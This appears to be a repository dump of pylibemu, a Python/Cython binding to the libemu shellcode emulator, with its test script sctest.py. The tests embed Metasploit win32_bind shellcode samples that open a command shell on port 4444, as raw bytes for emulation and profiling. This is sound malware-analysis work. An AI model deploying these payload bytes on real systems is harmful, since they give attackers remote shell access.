        for j in range(8):
            emu_cpu_reg32_set(_cpu, j, 0)

        # Seed a set of fixed addresses with the marker value 4711 and one
        # code dword at 0x7c80ffec. These presumably mirror libemu's own
        # sctest harness (addresses commonly touched by decoder stubs) —
        # confirm against libemu before changing them.
        emu_memory_write_dword(_mem, 0xef787c3c, 4711)
        emu_memory_write_dword(_mem, 0x0       , 4711)
        emu_memory_write_dword(_mem, 0x00416f9a, 4711)
        emu_memory_write_dword(_mem, 0x0044fcf7, 4711)
        emu_memory_write_dword(_mem, 0x00001265, 4711)
        emu_memory_write_dword(_mem, 0x00002583, 4711)
        emu_memory_write_dword(_mem, 0x00e000de, 4711)
        emu_memory_write_dword(_mem, 0x01001265, 4711)
        emu_memory_write_dword(_mem, 0x8a000066, 4711)
        emu_memory_write_dword(_mem, 0x7c80ffec, 0xc330408b)

        # Set the flags
        emu_cpu_eflags_set(_cpu, 0)

        # Write the code to the offset
        scode = shellcode
        static_offset = 0x417000
        emu_memory_write_block(_mem, static_offset, scode, len(shellcode))

        # Set eip to the code
        emu_cpu_eip_set(emu_cpu_get(self._emu), static_offset + offset)

        # A second copy of the code is placed at the initial stack address and
        # esp is pointed at it. `esp` here is presumably the register enum
        # constant from the cimport, not EMU_REGS.esp — confirm.
        emu_memory_write_block(_mem, 0x0012fe98, scode, len(shellcode))
        emu_cpu_reg32_set(emu_cpu_get(self._emu), esp, 0x0012fe98)

    # True when the hooked Win32 export is one that terminates the process.
    cdef check_stop_emulation(self, c_emu_env_hook *hook):
        return hook.hook.win.fnname.decode('utf-8') in ('ExitProcess', 'ExitThread', 'exit')

    cpdef int test(self, steps = 1000000):
        '''
        Method used to test and emulate the shellcode. The method must be always
        called after the `prepare' method.

        @type steps: Integer
        @param steps: Max number of steps to run

        @rtype: Integer
        @return: -1 if the emulator or its environment could not be created,
                 0 otherwise (also after an instruction error or an unhooked
                 call; the rendered profile is then available through
                 `emu_profile_output').
        '''
        cdef c_emu_cpu *_cpu
        cdef c_emu_memory *_mem
        cdef c_emu_env *_env
        cdef uint32_t eipsave
        cdef int j
        cdef int ret
        cdef c_emu_env_hook *hook

        if self._emu is NULL:
            return -1

        _cpu = emu_cpu_get(self._emu)
        _mem = emu_memory_get(self._emu)
        # NOTE(review): neither _env nor _env.profile is released anywhere in
        # this function, so each call leaks an environment and a profile.
        _env = emu_env_new(self._emu)
        if _env is NULL:
            print(emu_strerror(self._emu))
            return -1

        _env.profile = emu_profile_new()

        # IAT for sqlslammer
        emu_memory_write_dword(_mem, 0x42ae1018, 0x7c801d77)
        emu_memory_write_dword(_mem, 0x42ae1010, 0x7c80ada0)
        emu_memory_write_dword(_mem, 0x7c80ada0, 0x51ec8b55)
        emu_memory_write_byte(_mem, 0x7c814eeb, 0xc3)

        emu_env_w32_load_dll(_env.env.win, "urlmon.dll")

        # User hooks (see the top of the file). URLDownloadToFileA causes real
        # network and filesystem side effects on the analysis host.
        if self.enable_hooks:
            emu_env_w32_export_hook(_env, "ExitProcess", ExitProcess, NULL)
            emu_env_w32_export_hook(_env, "ExitThread", ExitThread, NULL)
            emu_env_w32_export_hook(_env, "URLDownloadToFileA", URLDownloadToFile, NULL)

        eipsave = 0
        ret = 0

        for j in range(steps):
            # eipsave is assigned but never read in this function.
            if not _cpu.repeat_current_instr:
                eipsave = emu_cpu_eip_get(emu_cpu_get(self._emu))

            # Presumably returns the hook when eip sits on a hooked Win32
            # export (and lets libemu service the call), NULL otherwise.
            hook = emu_env_w32_eip_check(_env)
            if hook is not NULL:
                if hook.hook.win.fnname is NULL:
                    # NOTE(review): the message interpolates the same NULL
                    # char*; check in the generated C that coercing a NULL
                    # pointer to a Python object does not itself fail here.
                    logging.warning("Unhooked call to %s\n" % (hook.hook.win.fnname, ))
                    break

                if self.check_stop_emulation(hook):
                    break
            else:
                # Decode the instruction at eip; if it is not a Linux syscall
                # handled by libemu, execute it.
                ret = emu_cpu_parse(emu_cpu_get(self._emu))
                hook = NULL
                if ret != -1:
                    hook = emu_env_linux_syscall_check(_env)
                    if hook is NULL:
                        ret = emu_cpu_step(emu_cpu_get(self._emu))
                else:
                    logging.warning("Error")

                if ret == -1:
                    break

        # Render whatever was recorded, even when the loop ended on an error.
        self.emu_profile.emu_profile_debug(_env)
        return 0

    cpdef int run(self, shellcode, steps = 1000000):
        '''
        Convenience wrapper: locate GetPC (falling back to offset 0), prepare
        the environment and emulate.

        @type shellcode: Binary string
        @param shellcode: Shellcode
        @type steps: Integer
        @param steps: Max number of steps to run

        @rtype: Integer
        @return: The result of `test'
        '''
        cdef int32_t offset

        offset = self.shellcode_getpc_test(shellcode)
        if offset < 0:
            offset = 0

        self.prepare(shellcode, offset)
        return self.test(steps = steps)

    @property
    def offset(self):
        '''GetPC offset found by the last `shellcode_getpc_test' call.'''
        return self._offset

    @property
    def emu_profile_output(self):
        '''Rendered call profile (the C buffer coerced to a Python bytes object).'''
        return self.emu_profile.output

    @property
    def emu_profile_truncated(self):
        '''True if the profile did not fit in the output buffer and was cut short.'''
        return self.emu_profile.truncate

    # CPU methods
    def cpu_reg32_get(self, c_emu_reg32 reg):
        '''
        Method used to get the 32-bit value stored in a register

        @type reg: Integer
        @param reg: Register index
                    eax = 0
                    ecx = 1
                    edx = 2
                    ebx = 3
                    esp = 4
                    ebp = 5
                    esi = 6
                    edi = 7

        @rtype: uint32_t
        @return: 32-bit value stored in the register

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_cpu *_cpu

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _cpu = emu_cpu_get(self._emu)
        return emu_cpu_reg32_get(_cpu, reg)

    def cpu_reg32_set(self, c_emu_reg32 reg, uint32_t val):
        '''
        Method used to set a register with a 32-bit value

        @type reg: Integer
        @param reg: Register index
                    eax = 0
                    ecx = 1
                    edx = 2
                    ebx = 3
                    esp = 4
                    ebp = 5
                    esi = 6
                    edi = 7

        @type val: uint32_t
        @param val: 32-bit value

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_cpu *_cpu

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _cpu = emu_cpu_get(self._emu)
        emu_cpu_reg32_set(_cpu, reg, val)

    def cpu_reg16_get(self, c_emu_reg16 reg):
        '''
        Method used to get the 16-bit value stored in a register

        @type reg: Integer
        @param reg: Register index
                    ax = 0
                    cx = 1
                    dx = 2
                    bx = 3
                    sp = 4
                    bp = 5
                    si = 6
                    di = 7

        @rtype: uint16_t
        @return: 16-bit value stored in the register

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_cpu *_cpu

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _cpu = emu_cpu_get(self._emu)
        return emu_cpu_reg16_get(_cpu, reg)

    def cpu_reg16_set(self, c_emu_reg16 reg, uint16_t val):
        '''
        Method used to set a register with a 16-bit value

        @type reg: Integer
        @param reg: Register index
                    ax = 0
                    cx = 1
                    dx = 2
                    bx = 3
                    sp = 4
                    bp = 5
                    si = 6
                    di = 7

        @type val: uint16_t
        @param val: 16-bit value

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_cpu *_cpu

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _cpu = emu_cpu_get(self._emu)
        emu_cpu_reg16_set(_cpu, reg, val)

    def cpu_reg8_get(self, c_emu_reg8 reg):
        '''
        Method used to get the 8-bit value stored in a register

        @type reg: Integer
        @param reg: Register index
                    al = 0
                    cl = 1
                    dl = 2
                    bl = 3
                    ah = 4
                    ch = 5
                    dh = 6
                    bh = 7

        @rtype: uint8_t
        @return: 8-bit value stored in the register

        Raises RuntimeError if the Emulator is not initialized

''' 772 | cdef c_emu_cpu *_cpu 773 | 774 | if self._emu is NULL: 775 | raise RuntimeError('Emulator not initialized') 776 | 777 | _cpu = emu_cpu_get(self._emu) 778 | return emu_cpu_reg8_get(_cpu, reg) 779 | 780 | def cpu_reg8_set(self, c_emu_reg8 reg, uint8_t val): 781 | ''' 782 | Method used to set a register with a 8-bit value 783 | 784 | @type reg: Integer 785 | @param reg: Register index 786 | al = 0 787 | cl = 1 788 | dl = 2 789 | bl = 3 790 | ah = 4 791 | ch = 5 792 | dh = 6 793 | bh = 7 794 | 795 | @type val: uint8_t 796 | @param val: 8-bit value 797 | 798 | Raises RuntimeError if the Emulator is not initialized 799 | ''' 800 | cdef c_emu_cpu *_cpu 801 | 802 | if self._emu is NULL: 803 | raise RuntimeError('Emulator not initialized') 804 | 805 | _cpu = emu_cpu_get(self._emu) 806 | emu_cpu_reg8_set(_cpu, reg, val) 807 | 808 | def cpu_eflags_get(self): 809 | ''' 810 | Method used to get the 32-bit value stored in the register eflags 811 | 812 | @rtype: uint32_t 813 | @return: 32-bit value stored in the register eflags 814 | 815 | Raises RuntimeError if the Emulator is not initialized 816 | ''' 817 | cdef c_emu_cpu *_cpu 818 | 819 | if self._emu is NULL: 820 | raise RuntimeError('Emulator not initialized') 821 | 822 | _cpu = emu_cpu_get(self._emu) 823 | return emu_cpu_eflags_get(_cpu) 824 | 825 | def cpu_eflags_set(self, uint32_t val): 826 | ''' 827 | Method used to set the register eflags with a 32-bit value 828 | 829 | @type val: uint32_t 830 | @param val: 32-bit value 831 | 832 | Raises RuntimeError if the Emulator is not initialized 833 | ''' 834 | cdef c_emu_cpu *_cpu 835 | 836 | if self._emu is NULL: 837 | raise RuntimeError('Emulator not initialized') 838 | 839 | _cpu = emu_cpu_get(self._emu) 840 | emu_cpu_eflags_set(_cpu, val) 841 | 842 | def cpu_eip_set(self, uint32_t eip): 843 | ''' 844 | Method used to set the register eip with a 32-bit value 845 | 846 | @type val: uint32_t 847 | @param val: 32-bit value 848 | 849 | Raises RuntimeError if the 
Emulator is not initialized 850 | ''' 851 | cdef c_emu_cpu *_cpu 852 | 853 | if self._emu is NULL: 854 | raise RuntimeError('Emulator not initialized') 855 | 856 | _cpu = emu_cpu_get(self._emu) 857 | emu_cpu_eip_set(_cpu, eip) 858 | 859 | def cpu_eip_get(self): 860 | ''' 861 | Method used to get the 32-bit value stored in the register eip 862 | 863 | @rtype: uint32_t 864 | @return: 32-bit value stored in the register eip 865 | 866 | Raises RuntimeError if the Emulator is not initialized 867 | ''' 868 | cdef c_emu_cpu *_cpu 869 | 870 | if self._emu is NULL: 871 | raise RuntimeError('Emulator not initialized') 872 | 873 | _cpu = emu_cpu_get(self._emu) 874 | return emu_cpu_eip_get(_cpu) 875 | 876 | def cpu_parse(self): 877 | ''' 878 | Method used to parse an instruction at eip 879 | 880 | Raises RuntimeError if the Emulator is not initialized 881 | ''' 882 | cdef c_emu_cpu *_cpu 883 | 884 | if self._emu is NULL: 885 | raise RuntimeError('Emulator not initialized') 886 | 887 | _cpu = emu_cpu_get(self._emu) 888 | return emu_cpu_parse(_cpu) 889 | 890 | def cpu_step(self): 891 | ''' 892 | Method used to step the last instruction 893 | 894 | Raises RuntimeError if the Emulator is not initialized 895 | ''' 896 | cdef c_emu_cpu *_cpu 897 | 898 | if self._emu is NULL: 899 | raise RuntimeError('Emulator not initialized') 900 | 901 | _cpu = emu_cpu_get(self._emu) 902 | return emu_cpu_step(_cpu) 903 | 904 | def cpu_debugflag_set(self, uint8_t flag): 905 | ''' 906 | Method used to set a cpu debug flag 907 | 908 | @type flag: uint8_t 909 | @param flag: flag to set 910 | 911 | Raises RuntimeError if the Emulator is not initialized 912 | ''' 913 | cdef c_emu_cpu *_cpu 914 | 915 | if self._emu is NULL: 916 | raise RuntimeError('Emulator not initialized') 917 | 918 | _cpu = emu_cpu_get(self._emu) 919 | emu_cpu_debugflag_set(_cpu, flag) 920 | 921 | def cpu_debugflag_unset(self, uint8_t flag): 922 | ''' 923 | Method used to unset a cpu debug flag 924 | 925 | @type flag: uint8_t 926 | 
@param flag: flag to unset 927 | 928 | Raises RuntimeError if the Emulator is not initialized 929 | ''' 930 | cdef c_emu_cpu *_cpu 931 | 932 | if self._emu is NULL: 933 | raise RuntimeError('Emulator not initialized') 934 | 935 | _cpu = emu_cpu_get(self._emu) 936 | emu_cpu_debugflag_unset(_cpu, flag) 937 | 938 | def cpu_get_current_instruction(self): 939 | ''' 940 | Method used to disassemble the current instruction 941 | 942 | @rtype : string 943 | @return : disassembled current instruction 944 | 945 | Raises RuntimeError if the Emulator is not initialized 946 | ''' 947 | if self._emu is NULL: 948 | raise RuntimeError('Emulator not initialized') 949 | 950 | self.cpu_debugflag_set(1) 951 | self.cpu_parse() 952 | instr_string = emu_cpu_get(self._emu).instr_string 953 | self.cpu_debugflag_unset(1) 954 | 955 | return instr_string 956 | 957 | # Memory methods 958 | def memory_write_byte(self, uint32_t addr, uint8_t byte): 959 | ''' 960 | Method used to write a byte at a memory location 961 | 962 | @type addr: uint32_t 963 | @param addr: memory location address 964 | 965 | @type byte: uint8_t 966 | @param byte: byte to write 967 | 968 | Raises RuntimeError if the Emulator is not initialized 969 | ''' 970 | cdef c_emu_memory *_mem 971 | 972 | if self._emu is NULL: 973 | raise RuntimeError('Emulator not initialized') 974 | 975 | _mem = emu_memory_get(self._emu) 976 | emu_memory_write_byte(_mem, addr, byte) 977 | 978 | def memory_write_word(self, uint32_t addr, uint16_t word): 979 | ''' 980 | Method used to write a word at a memory location 981 | 982 | @type addr: uint32_t 983 | @param addr: memory location address 984 | 985 | @type word: uint16_t 986 | @param word: word to write 987 | 988 | Raises RuntimeError if the Emulator is not initialized 989 | ''' 990 | cdef c_emu_memory *_mem 991 | 992 | if self._emu is NULL: 993 | raise RuntimeError('Emulator not initialized') 994 | 995 | _mem = emu_memory_get(self._emu) 996 | emu_memory_write_word(_mem, addr, word) 997 | 998 | 
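# --- memory access methods, continued ---
    def memory_write_dword(self, uint32_t addr, uint32_t dword):
        '''
        Method used to write a dword at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @type dword: uint32_t
        @param dword: dword to write

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_memory *_mem

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        emu_memory_write_dword(_mem, addr, dword)

    def memory_write_block(self, uint32_t addr, src, size_t _len):
        '''
        Method used to write a block at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @type src: bytes
        @param src: block of data to write

        @type _len: size_t
        @param _len: number of bytes of src to write; must not exceed len(src)

        Raises RuntimeError if the Emulator is not initialized
        Raises ValueError if _len is larger than the data held by src
        '''
        cdef c_emu_memory *_mem

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        # _len reaches the C side independently of src, so a value larger
        # than the Python buffer would let libemu read past its end.
        # Reject it before anything is copied into emulated memory.
        if _len > len(src):
            raise ValueError('_len (%d) exceeds the size of src (%d)' % (_len, len(src)))

        _mem = emu_memory_get(self._emu)
        emu_memory_write_block(_mem, addr, src, _len)

    def memory_read_byte(self, uint32_t addr):
        '''
        Method used to read a byte at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @rtype: uint8_t
        @return: byte at memory location address

        Raises RuntimeError if the Emulator is not initialized or the
        read fails
        '''
        cdef c_emu_memory *_mem
        cdef uint8_t byte

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        if emu_memory_read_byte(_mem, addr, &byte):
            raise RuntimeError("Error while reading a byte at address 0x%x" % (addr, ))

        return byte

    def memory_read_word(self, uint32_t addr):
        '''
        Method used to read a word at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @rtype: uint16_t
        @return: word at memory location address

        Raises RuntimeError if the Emulator is not initialized or the
        read fails
        '''
        cdef c_emu_memory *_mem
        cdef uint16_t word

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        if emu_memory_read_word(_mem, addr, &word):
            raise RuntimeError("Error while reading a word at address 0x%x" % (addr, ))

        return word

    def memory_read_dword(self, uint32_t addr):
        '''
        Method used to read a dword at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @rtype: uint32_t
        @return: dword at memory location address

        Raises RuntimeError if the Emulator is not initialized or the
        read fails
        '''
        cdef c_emu_memory *_mem
        cdef uint32_t dword

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        if emu_memory_read_dword(_mem, addr, &dword):
            # The message used to say "word", which made it indistinguishable
            # from a failed memory_read_word().
            raise RuntimeError("Error while reading a dword at address 0x%x" % (addr, ))

        return dword

    def memory_read_block(self, uint32_t addr, size_t _len):
        '''
        Method used to read a block at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @type _len: size_t
        @param _len: block size

        @rtype: bytes
        @return: the _len bytes stored at the memory location address

        Raises RuntimeError if the Emulator is not initialized or the
        read fails
        '''
        cdef c_emu_memory *_mem
        cdef char *dest

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        # The previous implementation malloc()'d a buffer that was neither
        # freed on the error path nor after use, and returned the raw
        # void * (which Cython cannot hand to Python). A Python-owned
        # bytearray has nothing to free and yields a proper bytes result.
        buf = bytearray(_len)
        dest = buf

        _mem = emu_memory_get(self._emu)
        if emu_memory_read_block(_mem, addr, <void *>dest, _len):
            raise RuntimeError("Error while reading a block at address 0x%x" % (addr, ))

        return bytes(buf)

    def memory_read_string(self, uint32_t addr, uint32_t maxsize):
        '''
        Method used to read a string at a memory location

        @type addr: uint32_t
        @param addr: memory location address

        @type maxsize: uint32_t
        @param maxsize: string max size

        @rtype: bytes
        @return: string at memory location address

        Raises RuntimeError if the Emulator is not initialized or the
        read fails
        '''
        cdef c_emu_memory *_mem
        cdef c_emu_string s

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        if emu_memory_read_string(_mem, addr, &s, maxsize):
            raise RuntimeError("Error while reading a string at address 0x%x" % (addr, ))

        # NOTE(review): s.data is presumably allocated by libemu and is not
        # released here once it has been copied into the returned bytes
        # object - confirm the matching libemu release call is declared in
        # pylibemu.pxd and invoke it after the copy.
        return s.data

    def memory_segment_select(self, c_emu_segment segment):
        '''
        Method used to select a segment

        @type segment: Integer
        @param segment: Segment index
                        s_cs = 0
                        s_ss = 1
                        s_ds = 2
                        s_es = 3
                        s_fs = 4
                        s_gs = 5

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_memory *_mem

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        emu_memory_segment_select(_mem, segment)

    def memory_segment_get(self):
        '''
        Method used to get the current segment

        @rtype: Integer
        @return: Segment index
                 s_cs = 0
                 s_ss = 1
                 s_ds = 2
                 s_es = 3
                 s_fs = 4
                 s_gs = 5

        Raises RuntimeError if the Emulator is not initialized
        '''
        cdef c_emu_memory *_mem

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        _mem = emu_memory_get(self._emu)
        return emu_memory_segment_get(_mem)

    # Win32 environment
    def env_w32_hook_check(self):
        '''
        Method used to check if a hooked Win32 API is at the
        current eip

        @rtype: boolean
        @return: True if a hooked Win32 API is at the current
                 eip, False otherwise

        Raises RuntimeError if the Emulator is not initialized or the
        emulator environment cannot be created
        '''
        cdef c_emu_env *_env

        if self._emu is NULL:
            raise RuntimeError('Emulator not initialized')

        # NOTE(review): a fresh environment is created on every call and is
        # never released, so repeated checks grow memory - confirm libemu's
        # environment release call is declared in pylibemu.pxd and use it
        # once the eip check is done.
        _env = emu_env_new(self._emu)
        if _env is NULL:
            print(emu_strerror(self._emu))
            raise RuntimeError('Emulator environment error')

        if emu_env_w32_eip_check(_env) is NULL:
            return False

        return True
--------------------------------------------------------------------------------
/tests/sctest.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# sctest.py
#
# Copyright(c) 2011-2022 Angelo Dell'Aera
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.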
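#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA

import sys
import getopt
import logging

#log = logging.getLogger('pylibemu')
#handler = logging.StreamHandler(stream = sys.stdout)
#formatter = logging.Formatter(datefmt = None)
#handler.setFormatter(formatter)
#log.addHandler(handler)
#log.setLevel(logging.INFO)

from pylibemu import Emulator

class ShellcodeTest():
    """Drive a pylibemu Emulator over a set of sample shellcodes.

    Each ``testShellcodeN`` method feeds one sample to the emulator and logs
    the resulting profile; ``run`` walks them in numeric order.
    """

    def __init__(self):
        self.log = logging.getLogger("ShellcodeTest")
        self.log.setLevel(logging.DEBUG)
        self.emulator = Emulator()

    def run(self):
        """Invoke testShellcode1, testShellcode2, ... until a number is missing."""
        index = 1
        while True:
            test = getattr(self, "testShellcode%s" % (index, ), None)
            if test is None:
                break
            test()
            index += 1

    def _logProfile(self):
        """Log the emulation profile and warn when libemu truncated it."""
        # The profile text is produced by libemu while emulating untrusted
        # shellcode, so it is not guaranteed to be valid UTF-8; a decode
        # error should not abort the whole run.
        self.log.info(self.emulator.emu_profile_output.decode('utf-8', errors='replace'))
        if self.emulator.emu_profile_truncated:
            self.log.warning("[WARNING] Emulation profile truncated")

    def _runShellcode(self, shellcode, index):
        """Emulate *shellcode* step by step (getpc test, prepare, test).

        *index* is accepted for symmetry with the callers but is not used.
        The emulator is released in a finally block so an exception raised
        during emulation cannot leak the libemu instance.
        """
        self.emulator.new()
        try:
            offset = self.emulator.shellcode_getpc_test(shellcode)
            if offset < 0:
                offset = 0

            self.log.debug("Offset: %d", offset)

            self.emulator.prepare(shellcode, offset)
            self.emulator.test()

            self._logProfile()
        finally:
            self.emulator.free()

    def runShellcode(self, shellcode, index):
        """Emulate *shellcode* through Emulator.run() and log the profile.

        *index* is accepted for symmetry with the callers but is not used.
        The emulator is released in a finally block so an exception raised
        during emulation cannot leak the libemu instance.
        """
        self.emulator.new()
        try:
            self.emulator.run(shellcode)

            self.log.debug("Offset: %d", self.emulator.offset)
            self._logProfile()
        finally:
            self.emulator.free()

    def testShellcode0(self):
        # Entry point: run() starts at index 1, so this is never re-entered.
        self.run()

    def testShellcode1(self):
        """
        win32_bind - EXITFUNC=seh LPORT=4444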
Size=317 Encoder=None http://metasploit.com 83 | """ 84 | 85 | shellcode = b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" 86 | shellcode += b"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" 87 | shellcode += b"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" 88 | shellcode += b"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" 89 | shellcode += b"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" 90 | shellcode += b"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" 91 | shellcode += b"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" 92 | shellcode += b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" 93 | shellcode += b"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" 94 | shellcode += b"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" 95 | shellcode += b"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" 96 | shellcode += b"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" 97 | shellcode += b"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" 98 | shellcode += b"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" 99 | shellcode += b"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" 100 | shellcode += b"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" 101 | shellcode += b"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" 102 | shellcode += b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" 103 | shellcode += b"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" 104 | shellcode += b"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" 105 | 106 | self.runShellcode(shellcode, 1) 107 | 108 | def testShellcode2(self): 109 | """ 110 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com 111 | """ 112 | 113 | shellcode = 
b"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x47" 114 | shellcode += b"\x13\x2b\xc0\x83\xee\xfc\xe2\xf4\xbb\x79\xc0\x8d\xaf\xea\xd4\x3f" 115 | shellcode += b"\xb8\x73\xa0\xac\x63\x37\xa0\x85\x7b\x98\x57\xc5\x3f\x12\xc4\x4b" 116 | shellcode += b"\x08\x0b\xa0\x9f\x67\x12\xc0\x89\xcc\x27\xa0\xc1\xa9\x22\xeb\x59" 117 | shellcode += b"\xeb\x97\xeb\xb4\x40\xd2\xe1\xcd\x46\xd1\xc0\x34\x7c\x47\x0f\xe8" 118 | shellcode += b"\x32\xf6\xa0\x9f\x63\x12\xc0\xa6\xcc\x1f\x60\x4b\x18\x0f\x2a\x2b" 119 | shellcode += b"\x44\x3f\xa0\x49\x2b\x37\x37\xa1\x84\x22\xf0\xa4\xcc\x50\x1b\x4b" 120 | shellcode += b"\x07\x1f\xa0\xb0\x5b\xbe\xa0\x80\x4f\x4d\x43\x4e\x09\x1d\xc7\x90" 121 | shellcode += b"\xb8\xc5\x4d\x93\x21\x7b\x18\xf2\x2f\x64\x58\xf2\x18\x47\xd4\x10" 122 | shellcode += b"\x2f\xd8\xc6\x3c\x7c\x43\xd4\x16\x18\x9a\xce\xa6\xc6\xfe\x23\xc2" 123 | shellcode += b"\x12\x79\x29\x3f\x97\x7b\xf2\xc9\xb2\xbe\x7c\x3f\x91\x40\x78\x93" 124 | shellcode += b"\x14\x40\x68\x93\x04\x40\xd4\x10\x21\x7b\x3a\x9c\x21\x40\xa2\x21" 125 | shellcode += b"\xd2\x7b\x8f\xda\x37\xd4\x7c\x3f\x91\x79\x3b\x91\x12\xec\xfb\xa8" 126 | shellcode += b"\xe3\xbe\x05\x29\x10\xec\xfd\x93\x12\xec\xfb\xa8\xa2\x5a\xad\x89" 127 | shellcode += b"\x10\xec\xfd\x90\x13\x47\x7e\x3f\x97\x80\x43\x27\x3e\xd5\x52\x97" 128 | shellcode += b"\xb8\xc5\x7e\x3f\x97\x75\x41\xa4\x21\x7b\x48\xad\xce\xf6\x41\x90" 129 | shellcode += b"\x1e\x3a\xe7\x49\xa0\x79\x6f\x49\xa5\x22\xeb\x33\xed\xed\x69\xed" 130 | shellcode += b"\xb9\x51\x07\x53\xca\x69\x13\x6b\xec\xb8\x43\xb2\xb9\xa0\x3d\x3f" 131 | shellcode += b"\x32\x57\xd4\x16\x1c\x44\x79\x91\x16\x42\x41\xc1\x16\x42\x7e\x91" 132 | shellcode += b"\xb8\xc3\x43\x6d\x9e\x16\xe5\x93\xb8\xc5\x41\x3f\xb8\x24\xd4\x10" 133 | shellcode += b"\xcc\x44\xd7\x43\x83\x77\xd4\x16\x15\xec\xfb\xa8\xb7\x99\x2f\x9f" 134 | shellcode += b"\x14\xec\xfd\x3f\x97\x13\x2b\xc0" 135 | 136 | self.runShellcode(shellcode, 2) 137 | 138 | def testShellcode3(self): 139 | """ 140 | win32_bind - EXITFUNC=seh LPORT=4444 
